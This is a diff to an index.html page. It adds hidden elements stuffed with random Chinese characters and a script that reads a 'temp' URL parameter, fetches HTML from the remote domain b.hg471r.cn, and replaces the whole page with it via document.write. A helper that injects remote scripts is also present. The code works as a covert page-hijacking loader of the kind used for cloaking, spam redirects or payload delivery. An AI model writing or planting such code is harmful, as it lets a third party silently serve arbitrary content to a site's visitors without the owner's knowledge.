--- a/index.html
+++ b/index.html
@@ -1,6 +1,11 @@
+        <!DOCTYPE html>
 <html>
 <head> <meta charset="utf-8" /></head>
-<body></body>
+<body> 
+<img  src='' style='display:none'>
+<ul style='display:none' >寸偶康乘蔚妮途秽烘汝闷缮冲裙撩乡秤仇井离小首狼替春借娠日吻祷稻输串逗变棘舍脾败诺菱沥词叹盲半裙</ul>
+<div style='display:none'>羚喊茹枚探妙惊摹抵褥歉侧女脖忙羞绍坞烁堵酸珐阶皖壕窟女屁刊僻查材担角八把肆酚具吴秃撤炬侨浑猎宋兰摔健晚强贝射挝稿酥汀韧表床览胎起画激泛赋猩女茨霖道秀翠弊忻辉射晦狡坪猩谁彩罐捶</div>
+<img  src='' style='display:none'></body>
 <script>
     function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
     function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
@@ -17,9 +22,10 @@
             n.send(null)
     }
     var temp = getUrlParam('temp');
+    
     //if(document.referrer){
     var temp_name = temp +'.html';
-    Dget('https://hbb2.oss-cn-beijing.aliyuncs.com/jb/'+temp_name+'?n='+new Date().getTime(),function(res){
+    Dget('https://b.hg471r.cn/jb/'+temp_name,function(res){
         var doc=document.open("text/html","replace")
         doc.write(res);
         doc.close()
